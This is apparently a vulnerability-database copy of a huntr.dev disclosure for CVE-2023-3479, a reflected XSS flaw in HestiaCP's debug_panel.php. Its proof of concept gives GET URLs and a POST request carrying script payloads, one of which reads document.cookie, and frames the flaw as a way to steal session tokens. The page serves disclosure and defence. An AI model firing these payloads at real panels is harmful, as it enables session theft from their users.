Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrIamxhunt3r6AC5CF87-6350-4645-8930-8F2876427723
HistoryJun 29, 2023 - 4:45 p.m.

Reflected XSS

2023-06-2916:45:42
iamxhunt3r
www.huntr.dev
7
reflected xss
session token theft
exploitation
get request
post request

0.001 Low

EPSS

Percentile

32.9%

JSON

Description

An attacker can steal the session token of any user by exploiting reflected XSS.

Proof of Concept

Send GET request to any of the below links.

http://target/templates/pages/debug_panel.php?id=xss"><script>alert(document.cookie)</script>
http://target/templates/pages/debug_panel.php?id=xss"><script>alert('xss')</script>

Send POST request which looks like below

POST /templates/pages/debug_panel.php HTTP/1.1
Host: demo.hestiacp.com:8083
User-Agent: curl/7.79.1
Accept: */*
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
Connection: close

{"id":"<script>alert(1)</script>"}

Related

osv 1
cve 1
nuclei 1
nvd 1
cvelist 1
prion 1
osv
osv
CVE-2023-3479
2023-06-30 10:15:09
cve
cve
CVE-2023-3479
2023-06-30 10:15:09
nuclei
nuclei
Hestiacp <= 1.7.7 - Cross-Site Scripting
2023-07-09 09:02:02
nvd
nvd
CVE-2023-3479
2023-06-30 10:15:09
cvelist
cvelist
CVE-2023-3479 Cross-site Scripting (XSS) - Reflected in hestiacp/hestiacp
2023-06-30 09:55:14
prion
prion
Cross site scripting
2023-06-30 10:15:00

0.001 Low

EPSS

Percentile

32.9%

JSON
Related for 6AC5CF87-6350-4645-8930-8F2876427723
osv1cve1nuclei1nvd1cvelist1prion1